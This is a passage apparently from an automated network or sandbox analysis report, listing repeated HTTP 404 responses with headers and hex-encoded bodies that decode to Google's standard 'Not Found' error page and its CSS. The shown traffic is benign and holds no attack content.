69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 